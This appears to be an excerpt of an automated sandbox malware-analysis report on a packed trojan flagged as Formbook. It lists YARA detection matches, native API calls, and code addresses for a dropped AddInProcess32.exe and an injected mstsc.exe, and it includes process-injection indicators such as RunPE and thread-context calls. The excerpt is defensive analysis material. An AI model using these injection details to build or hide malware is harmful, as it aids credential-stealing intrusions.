          Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419DB3 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012FB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012FA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012FAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F95F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012FA710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012FA770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F9650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00159D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00159E10 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00159E90 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00159F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00159DB3 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00159E8A NtClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08814EF4 CreateProcessAsUserW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_0096C9BB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_0096EBE3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_0096D4AF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_00962590
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_00969E80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_00966750
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_00963988
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_0096C370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_0096B5C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04AB8514
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04AB0788
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04AB2798
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04ABCE58
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04AB1F98
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04AB8609
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04AB0778
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04AB7C50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04ABCE48
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_04ABD968
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08813810
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08810040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_088161A8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08810A28
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08818A48
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08811D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08813F40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_088178F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08813801
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_0881003F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08816198
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08815910
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08815920
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08816149
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08810A22
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08818A38
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08815499
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_088154A8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08816C60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08816C70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08811D42
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08819658
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08819668
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeCode function: 0_2_08813F3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00401026
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00401174
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00401208
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041E2AF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041E772
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00712050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D4120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BF900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0138E824
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA830
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E20A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013820A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CB090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013828EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01382B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA309
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DAB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135CB4F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EEBB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E138B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DEB9A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013623E3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137DBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013703DA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EABD8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB236
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136FA2B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013822AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374AEF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B0D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01382D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01381D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372D82
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CD5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013825DD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137D466
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01381FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0138DFCE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D6E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137D616
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01361EB6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01382EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0478841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0483D466
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04832D82
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04770D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_048425DD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04842D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0478D5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04841D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047A2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04821EB6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04796E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04842EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04795600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0483D616
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0484DFCE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04841FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_048420A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479A830
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_048428EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0484E824
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047A20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0478B090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04794120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0477F900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047999BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_048422AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B236
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834AEF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0482FA2B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479AB40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0483DBD2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_048303DA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_048223E3
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479A309
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AABD8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04842B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AEBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0481CB4F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479EB9A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047A138B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0015E2AF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00142D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00142D87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00149E40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0015E772
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00142FB0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 012BB150 appears 145 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0477B150 appears 145 times
          Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3424 -s 8832
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000000.662946839.00000000000CC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIMG_4785.exeH vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687367070.00000000087E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686994540.00000000055B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
